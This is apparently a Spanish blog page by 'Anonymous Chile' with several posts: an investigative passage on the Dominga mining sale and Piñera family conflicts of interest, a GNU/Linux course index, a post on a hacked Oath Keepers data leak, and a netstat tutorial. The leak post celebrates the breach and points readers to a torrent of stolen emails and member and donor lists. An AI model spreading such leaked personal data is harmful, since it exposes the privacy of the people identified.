En el punto 1.2 del documento se estipulaba el precio y la forma en pago: el día del cierre del acuerdo (10 de diciembre de 2010) se pagarían US $106,8 millones, mientras que la segunda cuota, de US $21 millones, se cancelaría el 18 de enero de 2011. Una tercera cuota, de US $9,9 millones, quedaría pendiente hasta a más tardar el 31 de diciembre de 2011, es decir, más de un año después del cierre del acuerdo. Sin embargo, ese último desembolso estaba sujeto a condiciones: dependía de que no cambiaran las reglas en la zona donde se ubicaría el proyecto minero, denominado Santa Dominga Norte Sur. En específico, se detallaba que el pago quedaba condicionado a que el sector no se transformara en una zona de exclusión o se convirtiera en un parque nacional o reserva nacional, lo que irremediablemente impediría el desarrollo del proyecto Dominga en esa área, así como la construcción de un puerto a 50 kilómetros de distancia, lo cual también se declara en contrato aquí enlazado.

Esas condiciones pueden parecer normales en un contrato de este tipo, pero este no era un contrato normal: el cambio en las condiciones que se detallaban en el documento dependía casi exclusivamente de la voluntad del Presidente de la República, Sebastián Piñera, familiar de uno de los mayores socios de la parte vendedora. El conflicto de interés era enorme y permaneció oculto hasta hoy.

El contrato de compraventa de Dominga da cuenta de la preocupación de Délano ante la eventualidad de que se impusieran medidas de protección ambiental en la zona de la mina y su puerto, lo que en ese momento tenía bastante sentido: cuatro meses antes, en la misma comuna, Piñera había detenido la construcción de Barrancones para, según dijo, proteger el ecosistema.

El científico Carlos Gaymer, académico de la Universidad Católica del Norte e integrante del Núcleo Milenio de Ecología y Manejo Sustentable de Islas Oceánicas, concuerda con que esa preocupación era razonable, y recuerda que el propio Piñera fue a Punta de Choros en agosto de 2010, donde habló de la importancia de proteger la zona (ver video más abajo), donde habita el 80% de la población mundial del pingüino de Humboldt. Según Gaymer, Barrancones y Dominga están en el mismo “hotspot” de biodiversidad y la zona donde se construiría el puerto de Dominga está ubicada justo donde anida gran parte de las aves de la zona.

La demanda por crear una zona de protección en la costa de La Higuera, donde se planea emplazar Dominga, puede rastrearse hasta 2004. El último hito antes de la venta de Dominga tuvo lugar en julio de 2010, cuando la ONG Océana propuso a la Conama de la Cuarta Región la creación de un área marina protegida en Punta de Choros, precisamente en la comuna de La Higuera. La petición estuvo cerca de concretarse recién en marzo de 2018, cuando en la última semana del segundo gobierno de Michelle Bachelet el consejo de ministros aprobó el Área Marina Protegida del Archipiélago de Humboldt. La iniciativa tuvo una sola lectura: bloquear Minera Dominga, que batallaba en tribunales por la reactivación del proyecto. Sin embargo, la Presidenta no alcanzó a firmar el decreto correspondiente y Piñera tampoco lo hizo después de asumir, pese a las demandas de científicos y ambientalistas.


El mapa muestra la localización planeada para la mina, el depósito de relaves y el puerto. En la parte superior se ve Punta de Choros, frente a las islas que conforman la Reserva Nacional Pingüino de Humboldt. Más abajo, donde se señaliza Caleta Chungungo, planeaba instalarse la Termoeléctrica Barrancones.

La presión ambiental llegó a su punto más alto cuando se preparaban tres proyectos termoeléctricos (Barrancones, Cruz Grande y Farellones), pero tras su suspensión se trasladó luego a Dominga, que en febrero de 2011 —dos meses después del cierre del acuerdo en BVI y antes del último pago— ingresó al Sistema de Evaluación de Impacto Ambiental un proyecto de prospección minera. Luego, en 2013, se presentó la solicitud para el desarrollo de la mina de hierro y su puerto. Se convirtió, hasta hoy, en uno de los proyectos más polémicos y resistidos por la ciudadanía, pese a que la inversión superaría los US $2.500 millones y promete crear miles de puestos de trabajo.

Tras una larga serie de batallas judiciales y administrativas, Dominga fue recientemente aprobada por la Comisión Ambiental de Coquimbo, aunque hay un recurso pendiente en la Corte Suprema. La Corte de Apelaciones de La Serena declaró admisible un recurso de protección presentada por la ONG para revertir la aprobación, lo que augura que nuevamente habrá una batalla judicial y además podría tener que pronunciarse el comité de ministros, que ya lo rechazó una vez durante el segundo gobierno de Michelle Bachelet.

En el marco de la querella presentada por el ex diputado Hugo Gutiérrez, la defensa de Sebastián Piñera argumentó que su participación en Dominga había alcanzado la ridícula suma de US $5. La explicación para aquello es que, si bien Piñera participaba en Administradora Bancorp a través de una cascada de sociedades, las cuotas del FIP Mediterráneo en 2010 estaban en un 99,9999995% en manos de Inversiones Odisea, otra sociedad de la familia Piñera-Morel.

Desde su constitución en 2006, Odisea estuvo conformada mayoritariamente por los cuatro hijos de Piñera, aunque éstos figuraban invirtiendo más de $4 mil millones que no podrían haber ganado por sí mismos (uno de ellos incluso era menor de edad en esa fecha). Todo indica que se trató de una forma de traspasarles la fortuna del padre. Piñera se salió completamente de Odisea el 10 de marzo de 2010, un día antes de asumir la Presidencia en su primer mandato, pero antes de desvincularse ejerció un derecho sobredimensionado para su porcentaje de participación y eligió como director a su amigo y socio José Cox con su solo voto. Además, concurrió con su voto para elegir a Fernando Barros, su abogado de cabecera y creador de su red de sociedades.

En su declaración judicial por la querella de Gutiérrez, Piñera dice que no sólo estaba fuera de la gestión de sus empresas desde 2009, sino que ni siquiera supo de la inversión que se había realizado en Dominga hasta después de dejar la Presidencia. Atribuye al “grupo de profesionales que administraba las inversiones de las empresas familiares” la decisión de vender esa participación en 2010.

Para este reportaje se enviaron cartas a Sebastián Piñera y Carlos Alberto Délano con preguntas sobre la operación de compraventa de Dominga en las Islas Vírgenes Británicas. Piñera nos derivó con el gerente general de su family office (rebautizada como Inversiones Odisea), Nicolás Noguera, quien respondió en la misma línea que lo había hecho hasta ahora: el Presidente no maneja sus negocios hace 12 años, no fue informado sobre el proceso de venta de Dominga y la investigación judicial sobre la operación lo sobreseyó.

Como Noguera fue también quien firmó el contrato de compraventa a nombre de Latin Mineral Limited, en un segundo cuestionario se le preguntó si al hacerlo no reparó en que había un conflicto de interés, considerando que Piñera era el presidente y el último pago estaba condicionado a decisiones administrativas. Respondió que al momento de firmar el acuerdo “no había ningún conflicto de interés, y en caso de que alguno hubiera surgido después de la transacción, habría que haberlo resuelto según la ley chilena”, soslayando que el gobierno de Piñera se había iniciado ocho meses antes de la suscripción del documento. Agregó que los pagos contingentes a la factibilidad de un proyecto son normales en este tipo de contratos y que “10 años y dos periodos presidenciales después de la venta de Minera Dominga, su ubicación no ha sido declarada un área protegida y el proyecto todavía enfrenta desafíos importantes para su aprobación”.

En cuanto a Délano, envió un detallado documento redactado por sus asesores, en que aseguraron que fueron los gestores del fondo que originalmente era dueño de Dominga quienes estructuraron su propiedad en BVI porque la idea original era venderla a compradores extranjeros. Eso explica también, agregaron, que la familia Délano constituyera Delcorp en esa jurisdicción para adquirirla, pero la sociedad se disolvió tras la operación y la propiedad de Dominga está hoy basada en Chile. “Las sociedades de la familia Délano que adquirieron el Proyecto Dominga cumplieron todas las obligaciones de declaración y/o pago de impuestos que eran aplicables a esa operación”, aseguraron.

Respecto a las condiciones que se fijaron para el pago de la última cuota, subrayaron que correspondía sólo al 6,5% del total del precio de venta y que las negociaciones se hicieron directamente con el fondo de inversión que vendió Dominga. Sin nombrar al Presidente, descartaron cualquier relación con él en la operación: “La vinculación de alguna autoridad con esta materia, que insinúa su carta, constituye una especulación completamente infundada que –como es de público conocimiento– fue materia de una investigación del Ministerio Público que fue sobreseída definitivamente, con costas”.

En el juicio mencionado por Noguera y por los asesores de Délano, en el que Piñera fue sobreseído, no se analizó la transacción que tuvo lugar en las Islas Vírgenes Británicas, pues no se conocía públicamente hasta hoy. Así se desprende también de un escrito presentado por el abogado de Piñera, Juan Domingo Acosta, para pedir su sobreseimiento, en el que detalla las acusaciones, evidencias y declaraciones que se hicieron durante la indagatoria, tanto respecto a Minera Dominga como en su participación en Exalmar. Siguiendo el presente documento del Cuarto Guzgado de Garantía de Santiago, se puede apreciar que el capítulo de las Islas Vírgenes Británicas está ausente de ese relato.

Amigos y socios

Legal o no, supiera Sebastián Piñera o no, la decisión de los Piñera Morel de dejar el cierre de la venta de Dominga sujeto a decisiones administrativas del gobierno de su padre constituye un conflicto de interés. El que la contraparte haya sido Carlos Alberto Délano agrava el problema, pues la transacción involucraba a uno de sus mejores amigos. Délano y Piñera se conocieron de niños, estudiaron juntos Ingeniería Comercial en la Universidad Católica, solían viajar juntos con sus parejas y han compartido diversos negocios, como el Edificio Las Américas, Cruz Blanca y la clínica Las Condes.

Cuando en 2015 Délano estuvo preso por el llamado caso Penta —donde fue condenado por el enorme engranaje con que evadió impuestos— Piñera dijo que “Carlos Alberto Délano ha sido, es y va a seguir siendo mi amigo”. Posteriormente lo visitó apenas le revocaron la prisión preventiva, ocasión en que señaló: “yo soy amigo de mis amigos en la buenas y en las maduras».

Una de las aristas del caso Penta también había involucrado a los negocios de Piñera, aunque terminó con una salida alternativa y sin condena para sus ejecutivos. La misma Administradora Bancorp, a través del FIP Mediterráneo, suscribió un contrato forward con Penta en medio de la campaña presidencial de 2009-2010. El SII se querelló por esta operación, al considerar que se generaban pérdidas ficticias para Penta.

El contrato del forward fue firmado por el entonces administrador de la campaña de Piñera, Santiago Valdés, y por Ana María Délano Abbott, hermana de Carlos Alberto Délano, y quien por años fue una de las profesionales de mayor confianza de Piñera en Bancard. Dicha confianza se extendió a su hija, Catalina Lamarca Délano, quien fue la administradora de los fondos de su campaña en la presidencial de 2017 y hace 10 años es subgerenta de Administración y Personas de Bancard-Inversiones Odisea, según se lee en su Linkedin. Además, en las últimas escrituras de las empresas del grupo Bancard figura como una de las personas con poder para representar a las sociedades.

La investigación del caso Penta reveló otra situación problemática para Dominga: Pablo Wagner, subsecretario de Minería durante el primer gobierno de Piñera, recibió pagos periódicos desde empresas Penta, donde había trabajado con anterioridad. En total fueron $65 millones. Fue condenado por enriquecimiento ilícito y delitos tributarios, aunque absuelto de los cargos de cohecho.

Délano toma el control en BVI

Al firmar el acuerdo de compra de las acciones que tenía Minería Activa Uno Spa en Andes Iron desde las Islas Vírgenes Británicas, Carlos Alberto Délano y su familia quedaron como los principales dueños del proyecto minero (hoy tienen el 75%, la familia Garcés el 14% y 11% está en manos de ejecutivos). En BVI, el control quedó en manos de Andes Iron Ltd., cuyas acciones colgaban de Delcorp International. Ese mismo 10 de diciembre de 2010, cuando se suscribió el acuerdo, se produjo el traspaso de la gestión de Andes Iron Ltd.: Juan Pablo Bambach renunció al cargo de único director de la compañía y fue reemplazado por Macarena Délano Méndez, hija de Carlos Alberto Délano. A nombre de Delcorp, ella y su cuñado Pedro Ducci habían firmado la compra de Andes Iron Ltd.

Pocas semanas después, el 3 de enero de 2011, los abogados de Délano empezaron a hacer gestiones para transferir fondos a Delcorp. La idea era que otra sociedad en BVI de Carlos Alberto Délano, Dibston Ltd., le hiciera un préstamo a Delcorp, sin que apareciera el nombre de Délano. Como Dibston era gestionada por la empresa panameña Alemán, Cordero, Galindo y Lee (Alcogal), les pidieron que uno de sus empleados firmara el crédito. “Quisiera saber alternativas para evitar que sea el director o accionista (en ambos casos el Sr. Carlos Alberto Délano) quien firme el contrato”, preguntó a través de un correo electrónico una abogada del estudio Alcaíno, el de mayor confianza de Délano. La respuesta, enviada el mismo 3 de enero, fue que Alcogal no prestaba ese servicio, por lo que el director o accionista (Délano) debía firmar el contrato.


Ambientalistas también afirman que el loro tricahue será una de las especies afectadas por Dominga

En su respuesta a las consultas para este reportaje, los asesores de Délano afirmaron sobre este punto que “la familia Délano no tiene conocimiento de que se haya pedido que algún documento relacionado con el préstamo de Dibston a Delcorp no fuera firmado por el Sr. Délano”.

De todos modos, desde Alcogal les habían dado como alternativa que nombrara a un representante para la firma del préstamo. Fue así que el 11 de enero de 2011 Carlos Alberto Délano envió una carta a Alcogal designando a Luis A. de Armas como apoderado para firmar el préstamo a Delcorp a nombre de Dibston. De Armas es un abogado de Florida que oficiaba como secretario de Penta Realtors Inc., una firma utilizada por el grupo Penta para llevar a cabo su negocio inmobiliario en Miami. El borrador del contrato de préstamo entre las dos sociedades radicadas en BVI enviado por los abogados es por US $40 millones, aunque los asesores de Délano dicen que el préstamo fue de US $35,9 millones. Por la fecha, es posible que parte de esos fondos hayan sido para pagar la segunda cuota de la compra de Andes Iron, que vencía pocos días después.

Minería Activa Uno Spa vive

Otra arista desconocida hasta ahora es que luego de la venta de Dominga y aún después del escándalo del caso Penta, las familias Délano Méndez y Piñera Morel siguen siendo socias. La empresa original que las unió en 2009, Minería Activa Uno Spa, vendió Dominga, pero mantiene su misión original de invertir en proyectos mineros. Por los Délano se mantiene Inmobiliaria Duero, mientras que por los Piñera el FIP Mediterráneo fue reemplazado por Inversiones Odisea, propiedad de los cuatro hijos del Presidente.

El capital de Minería Activa Uno Spa aumentó en agosto de 2010 de $576 millones a $6.076 millones gracias la venta de Dominga. El último capital publicado en el Diario Oficial, en 2020, es de $7.100 millones.

Actualmente, Minería Activa Uno Spa está bajo el alero de Minería Activa –una empresa que mantiene el espíritu de invertir en proyectos mineros en su etapa temprana–, que a su vez es parte de Activa Alternative Assets. Esta última, creada por Larraín Vial, pertenece a la sociedad Activa Spa, cuyo gerente general es Tomás Délano Méndez, uno de los hijos de Carlos Alberto Délano.


El zorro cumpeo es otra de las especies que viven en la zona

En la web de Activa Spa se relata la historia de la compañía y se señala como un hito la venta de Dominga, a un precio 10 veces mayor de lo invertido sólo 18 meses antes. También se informa que Minería Activa continuó su expansión gracias al financiamiento de un fondo de Corfo.

El gerente general y socio de Minería Activa es Ignacio del Río, quien hasta 2011 fue gerente de inversiones de Bancard. En una presentación de 2018 dice que a esa fecha Activa y Grupo Loa (ambos ligados a Larraín Vial) administraban cinco fondos, uno de los cuales era Minería Activa Uno Spa, donde participan los Délano y los Piñera. En ese momento el fondo tenía inversiones en tres proyectos en etapa de exploración: Minera Central Andes (con concesiones en la Región de Antofagasta), Minería Indiana (con activos cerca de Copiapó) y Minera Filipina (en la zona de Vallenar). En la web de la empresa se señala que el estatus actual del fondo es “invertido, salida parcial” y que se han realizado siete inversiones por US$38,6 millones, con un retorno para los inversionistas del 294%.

De ser correctos los números, la apuesta de los Piñera y los Délano por Minería Activa Uno Spa ha sido un negocio redondo. Sin embargo, desde el punto de vista del interés público da cuenta de que pese a las históricas polémicas que arrastran las inversiones del Presidente y su familia, siguen invirtiendo en sectores con potenciales conflictos de interés, como la minería.

85 comentarios

Curso GNU/Linux de la UTN

Publicada el 03/10/2021 - 03/10/2021 por Anonymous Chile

A partir del año 2010 la UTN-FRA (Universidad Tecnológica Nacional Facultad Regional de Avellaneda) comenzó a trabajar en la difusión de tecnologías basadas en software libre considerando que éstas tendrán un rol fundamental en los años venideros.

Pero, ¿qué es, exactamente, el software libre? La definición mantenida por la Fundación para el Software Libre dice que el software es libre si y solo si respeta y cumple con cuatro derechos o libertades básicas y fundamentales:

Libertad 0: Utilizar el programa sin restricciones, donde quieran, como quieran y para lo que quieran.

Libertad 1: Estudiar cómo funciona el programa y, si lo desean, adaptarlo a sus necesidades específicas.

Libertad 2: Distribuir copias a sus amigos, empleados, conocidos, empleadores y, en fin, a cualquier persona que deseen.

Libertad 3: Mejorar el programa, publicar y distribuir sus mejoras al público (o a quien deseen) de modo que más personas salgan beneficiadas de los cambios.

Objetivos

El objetivo es que lxs estudiantes aprendan GNU/Linux de forma global, permitiéndoles reconocer las diferencias, ventajas y desventajas que existen entre las distribuciones más populares. Esta especialización apunta a profesionales, investigadorxs y especialistas de temáticas afines que estén interesadxs en conocer en profundidad el funcionamiento del sistema GNU/Linux tanto para uso profesional como personal y que deseen incorporar a sus conocimientos de informática este sistema operativo.

Indice y material de los cursos dictados por la UTN para sus estudiantes:

Curso parte 1:

  • Clase 1 – ¿Qué es el software libre?
  • Clase 2 – ¿Qué es GNU/Debian? – Instalación
  • Clase 3 – Consola, archivos
  • Clase 3-1 – Comandos básicos I
  • Clase 4 – Comandos básicos II
  • Clase 5 – Manejo de paquetes
  • Clase 6 – Comandos básicos III
  • Clase 7 – Manejo del editor Vim
  • Clase 8 – Nivel de arranque y procesos
  • Clase 9 – Comandos básicos III
  • Clase 10 – Expresiones regulares
  • Clase 11 – Usuarios, grupos, etcétera
  • Clase 12 – Montaje, manejo del sistema de archivos y el gestor de ventanas Xorg
  • Práctica de examen – Nivel 1

Curso parte 2:

  • Clase 1, 2 y 3 – programación en bash (preliminar)
  • Ejercicios de programación en bash
  • Ejemplos de bash
  • Clase 4 – Raid y LVM
  • Clase 5 – Curso de redes
  • Clase 6 – Configuración de redes

Clases especiales

  • Instalación de paquetes en OpenVZ
  • OpenVZ
  • Apache-MySQL-PHP-Mediawiki
  • Subversion
  • DNS – DHCP – Squid – SquidGuard – Lighttpd
  • Programación
  • Programación en leguaje C
  • Python para todos
  • Glade con Python (GTK)
  • Sobre Vim
  • Manejo del editor Vim en el lenguaje C
  • Instalación del plugin C para Vim
  • Instalación del plugin bash para Vim
  • Archivo Vimrc
  • Diagramas
  • Mapa conceptual de licencias
  • Imagen del software libre
  • Distribuciones de GNU/Linux en el tiempo
  • Debian GNU/LInux cubo de comandos
  • Red
  • Apuntes sobre configuración de bond (bonding)
  • Introducción a OpenSSH
  • Material extra
  • Licencias
  • Repositorios Debian GNU/Linux 6.0 (squeeze)
  • Expresiones regulares
  • Recuperar contraseña de root

Descarga el curso sobre GNU/Linux de la UTN

162 comentarios

Ciberataque expone información privada sobre la agrupación ultraconservadora y de extrema derecha Oath Keepers

Publicada el 30/09/2021 por Anonymous Chile

Una agrupación peligrosa, violenta y hostíl

Oath Keepers es una agrupación norteamericana de categoría paramilitar, antigubernamental, fascista, ultraconservadora y de extrema derecha conocida por numerosas manifestaciones, actos de violencia armada y componerse de miembros activos y retirados del ejército, de la policía y múltiples instituciones gubernamentales o estatales así como otros diferentes cuerpos de las fuerzas de la ley.

La mencionada en disputa ha sido cuestionada y criticada por mantener un comportamiento hostíl que amenaza la integridad, la dignidad, la libertad, la vida y derechos humanos, así como también promover la violencia, desobediencia civil y desorden público, en favor de las teorías conspirativas más ilógicas que se hayan conocido.

Información privada expuesta a la luz

De este modo, recientemente ha salido a la luz una filtración de información privada, datos confidenciales y altamente sensibles de aproximadamente 5 Gb donde se encuentran correos electrónicos, registros de chat, listas de miembros y donantes y otros archivos de los servidores de los Oath Keepers.

Los correos electrónicos, que incluyen información y datos de cada capítulo, sección o división de la agrupación en disputa, así como varias personas en funciones de liderazgo, datan desde el 13 de enero al 19 de septiembre de 2021, mientras que los registros de chat datan de entre el 22 hasta el 26 de junio de 2020 y luego desde el 5 de febrero hasta el 19 de septiembre de 2021. Del mismo modo, en los archivos se identifican decenas de miles de miembros actuales y antiguos, y también una enorme cantidad de donantes colaboradores de la agrupación.

Debido al uso que puede darse a los datos expuestos y sus conexiones con ciberataques o filtraciones de otras agrupaciones como Gab y GiveSendGo, puede obtenerse información adicional cruzando las referencias con muchos otros conjuntos de datos.

Material sensible restringido

Sin embargo, mientras que los correos electrónicos y los registros de chat se ponen a disposición del público, el resto (una pequeña minoría de los archivos) sólo se proporciona a periodistas, especialistas e investigadores debido a la presencia de PII, información financiera, contraseñas, claves de descifrado y otros datos que podrían ser objeto de abuso implicando consecuencias mayores y mucho más graves.

Descarga fichero torrent de la filtración

27 comentarios

Identificando, monitorizando y controlando conexiones, puertos, procesos y servicios con Netstat GNU/Linux

Publicada el 26/09/2021 - 28/09/2021 por Anonymous Chile

Netstat es una herramienta que permite identificar las conexiones, puertos y servicios de red activos en la máquina en la que se ejecuta el comando.

Por otro lado, también permite a su vez obtener estadísticas de numerosos protocolos (Ethernet, IPv4, TCP, UDP, ICMP e IPv6).

De esta manera podemos detectar intrusiones o actividades no autorizadas en nuestro sistema monitorizando procesos, servicios, puertos y conexiones operativas en nuestros equipos.

Instalación

yum install net-tools [CentOS/Fedora/RHEL]
apt-get install net-tools [Debian GNU/Linux]
zypper install net-tools [OpenSUSE]
pacman -S netstat-nat [Arch Linux]

Version Netstat

$ netstat -V
net-tools 2.10-alpha
Fred Baumgarten, Alan Cox, Bernd Eckenfels, Phil Blundell, Tuan Hoang, Brian Micek and others
+NEW_ADDRT +RTF_IRTT +RTF_REJECT +FW_MASQUERADE +I18N +SELINUX
AF: (inet) +UNIX +INET +INET6 +IPX +AX25 +NETROM +X25 +ATALK +ECONET +ROSE -BLUETOOTH
HW: +ETHER +ARC +SLIP +PPP +TUNNEL -TR +AX25 +NETROM +X25 +FR +ROSE +ASH +SIT +FDDI +HIPPI +HDLC/LAPB +EUI64

Ruta de tablas del núcleo del sistema

$ netstat -r
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
default gateway 0.0.0.0 UG 0 0 0 wlan0
192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0

Estadísticas de red

$ netstat -ai
Kernel Interface table
Iface MTU RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg
eth0 1500 0 0 0 0 0 0 0 0 BMU
lo 65536 788 0 0 0 788 0 0 0 LRU
wlan0 1500 1530768 0 0 0 868838 0 0 0 BMRU

Ver conexiones de redes

$ netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:4456 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:34349 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:51413 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:37013 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:39191 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:7070 0.0.0.0:* LISTEN
tcp 0 0 192.168.1.7:48252 172.217.3.66:443 ESTABLISHED
tcp 0 0 192.168.1.7:47776 149.154.175.52:80 ESTABLISHED
tcp 0 0 192.168.1.7:43394 149.154.175.52:443 ESTABLISHED
tcp 0 0 192.168.1.7:46938 168.167.90.251:80 ESTABLISHED
tcp 0 1 192.168.1.7:34829 37.145.53.6:51413 SYN_SENT
tcp 0 0 192.168.1.7:39826 149.154.175.52:443 ESTABLISHED
tcp 0 0 192.168.1.7:57526 172.217.8.142:80 ESTABLISHED
tcp 0 0 192.168.1.7:43594 104.27.142.36:80 ESTABLISHED
tcp 0 0 192.168.1.7:46207 209.222.97.121:80 ESTABLISHED
tcp 273680 0 192.168.1.7:36223 81.171.17.23:48188 ESTABLISHED
tcp 366878 0 192.168.1.7:46277 37.48.111.139:51833 ESTABLISHED
tcp 0 0 192.168.1.7:45454 35.166.120.204:443 ESTABLISHED
tcp 518239 0 192.168.1.7:40101 50.243.181.173:50329 ESTABLISHED
tcp6 0 0 :::4456 :::* LISTEN
tcp6 0 0 :::139 :::* LISTEN
tcp6 0 0 :::111 :::* LISTEN
tcp6 0 0 :::80 :::* LISTEN
tcp6 0 0 :::51413 :::* LISTEN
tcp6 0 0 ::1:631 :::* LISTEN
tcp6 0 0 :::445 :::* LISTEN
tcp6 0 0 :::42691 :::* LISTEN
tcp6 1 0 ::1:46008 ::1:631 CLOSE_WAIT
tcp6 1 0 ::1:46006 ::1:631 CLOSE_WAIT

Ver conexiones de servicios

$ sudo netstat -pnltu
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:4456 0.0.0.0:* LISTEN 3836/sshd
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 3190/smbd
tcp 0 0 0.0.0.0:34349 0.0.0.0:* LISTEN 1849/rpc.statd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 1792/rpcbind
tcp 0 0 0.0.0.0:51413 0.0.0.0:* LISTEN 7315/transmission-g
tcp 0 0 0.0.0.0:37013 0.0.0.0:* LISTEN 2433/anydesk
tcp 0 0 127.0.0.1:39191 0.0.0.0:* LISTEN 13945/haroopad
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 2712/cupsd
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 3190/smbd
tcp 0 0 0.0.0.0:7070 0.0.0.0:* LISTEN 2433/anydesk
tcp6 0 0 :::4456 :::* LISTEN 3836/sshd
tcp6 0 0 :::139 :::* LISTEN 3190/smbd
tcp6 0 0 :::111 :::* LISTEN 1792/rpcbind
tcp6 0 0 :::80 :::* LISTEN 2529/apache2
tcp6 0 0 :::51413 :::* LISTEN 7315/transmission-g
tcp6 0 0 ::1:631 :::* LISTEN 2712/cupsd
tcp6 0 0 :::445 :::* LISTEN 3190/smbd
tcp6 0 0 :::42691 :::* LISTEN 1849/rpc.statd
udp 0 0 0.0.0.0:51659 0.0.0.0:* 2825/avahi-daemon:
udp 0 0 0.0.0.0:46610 0.0.0.0:* 7315/transmission-g
udp 0 0 0.0.0.0:68 0.0.0.0:* 3448/dhclient
udp 0 0 0.0.0.0:111 0.0.0.0:* 1792/rpcbind
udp 0 0 0.0.0.0:631 0.0.0.0:* 2593/cups-browsed
udp 0 0 192.168.1.7:123 0.0.0.0:* 2775/ntpd
udp 0 0 127.0.0.1:123 0.0.0.0:* 2775/ntpd
udp 0 0 0.0.0.0:123 0.0.0.0:* 2775/ntpd
udp 0 0 192.168.1.255:137 0.0.0.0:* 2474/nmbd
udp 0 0 192.168.1.7:137 0.0.0.0:* 2474/nmbd
udp 0 0 0.0.0.0:137 0.0.0.0:* 2474/nmbd
udp 0 0 192.168.1.255:138 0.0.0.0:* 2474/nmbd
udp 0 0 192.168.1.7:138 0.0.0.0:* 2474/nmbd
udp 0 0 0.0.0.0:138 0.0.0.0:* 2474/nmbd
udp 0 0 0.0.0.0:661 0.0.0.0:* 1792/rpcbind
udp 0 0 0.0.0.0:46777 0.0.0.0:* 1849/rpc.statd
udp 0 0 0.0.0.0:51413 0.0.0.0:* 7315/transmission-g
udp 0 0 0.0.0.0:5353 0.0.0.0:* 2825/avahi-daemon:
udp 0 0 127.0.0.1:753 0.0.0.0:* 1849/rpc.statd
udp 0 0 0.0.0.0:40194 0.0.0.0:* 7315/transmission-g
udp 0 0 0.0.0.0:50001 0.0.0.0:* 2433/anydesk
udp6 0 0 :::37966 :::* 1849/rpc.statd
udp6 0 0 :::111 :::* 1792/rpcbind
udp6 0 0 fe80::da68:c52a:abd:123 :::* 2775/ntpd
udp6 0 0 ::1:123 :::* 2775/ntpd
udp6 0 0 :::123 :::* 2775/ntpd
udp6 0 0 :::661 :::* 1792/rpcbind
udp6 0 0 :::5353 :::* 2825/avahi-daemon:
udp6 0 0 :::50489 :::* 2825/avahi-daemon:

Netstat imprime información sobre el subsistema de red de GNU/Linux. El tipo de información que se imprime está controlado por el primer argumento, como sigue:

  • (none)
    Por defecto, netstat muestra una lista de sockets abiertos. Si no se especifica ninguna familia de direcciones, se imprimirán los sockets activos de todas las familias de direcciones configuradas.
    Active Internet connections (w/o servers)
    Proto Recv-Q Send-Q Local Address Foreign Address State
    tcp 0 0 10.152.152.10:9050 10.152.152.11:38370 ESTABLISHED
    tcp 0 0 10.0.2.15:41074 193.11.166.194:27025 ESTABLISHED
    tcp 0 0 localhost:54102 localhost:40649 ESTABLISHED
    tcp 0 0 localhost:40649 localhost:54250 ESTABLISHED
    tcp 0 0 localhost:54250 localhost:40649 ESTABLISHED
    tcp 0 0 localhost:40649 localhost:54102 ESTABLISHED
    tcp 0 0 10.0.2.15:51168 209.148.46.65:https ESTABLISHED
  • –route, -r
    Muestra las tablas de enrutamiento del núcleo. netstat -r y route -e producen la misma salida.
    Kernel IP routing table
    Destination Gateway Genmask Flags MSS Window irtt Iface
    default 10.0.2.2 0.0.0.0 UG 0 0 0 eth0
    10.0.2.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
    10.152.128.0 0.0.0.0 255.255.192.0 U 0 0 0 eth1
  • –groups, -g
    Muestra la información de pertenencia a grupos de multidifusión para IPv4 e IPv6.
    IPv6/IPv4 Group Memberships
    Interface RefCnt Group
    ————— —— ———————
    lo 1 224.0.0.1
    eth0 1 224.0.0.1
    eth1 1 224.0.0.1
    lo 1 ip6-allnodes
    lo 1 ff01::1
    eth0 1 ip6-allnodes
    eth0 1 ff01::1
    eth1 1 ip6-allnodes
    eth1 1 ff01::1
  • –interfaces, -i
    Muestra una tabla de todas las interfaces de red.
    Kernel Interface table
    Iface MTU RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg
    eth0 1500 1673620 0 0 0 963018 0 0 0 BMRU
    eth1 1500 599985 0 0 0 1014858 0 0 0 BMRU
    lo 65536 1344253 0 0 0 1344253 0 0 0 LRU
  • –statistics, -s
    Muestra las estadísticas resumidas de cada protocolo.
    Ip:
    Forwarding: 2
    3018499 total packets received
    0 forwarded
    0 incoming packets discarded
    3018499 incoming packets delivered
    2887700 requests sent out
    Icmp:
    20 ICMP messages received
    0 input ICMP message failed
    ICMP input histogram:
    destination unreachable: 20
    20 ICMP messages sent
    0 ICMP messages failed
    ICMP output histogram:
    destination unreachable: 20
    IcmpMsg:
    InType3: 20
    OutType3: 20
    Tcp:
    540 active connection openings
    967 passive connection openings
    0 failed connection attempts
    9 connection resets received
    7 connections established
    3006638 segments received
    3310112 segments sent out
    341 segments retransmitted
    0 bad segments received
    7 resets sent
    Udp:
    11821 packets received
    20 packets to unknown port received
    0 packet receive errors
    11841 packets sent
    0 receive buffer errors
    0 send buffer errors
    UdpLite:
    TcpExt:
    536 TCP sockets finished time wait in fast timer
    196484 delayed acks sent
    948 delayed acks further delayed because of locked socket
    Quick ack mode was activated 194 times
    1067468 packet headers predicted
    78786 acknowledgments not containing data payload received
    1422966 predicted acknowledgments
    16 congestion windows recovered without slow start after partial ack
    TCPLostRetransmit: 58
    1 retransmits in slow start
    TCPTimeouts: 90
    TCPLossProbes: 294
    TCPDSACKOldSent: 194
    TCPDSACKRecv: 258
    7 connections reset due to early user close
    8 connections aborted due to timeout
    TCPDSACKIgnoredNoUndo: 85
    TCPSackShiftFallback: 8
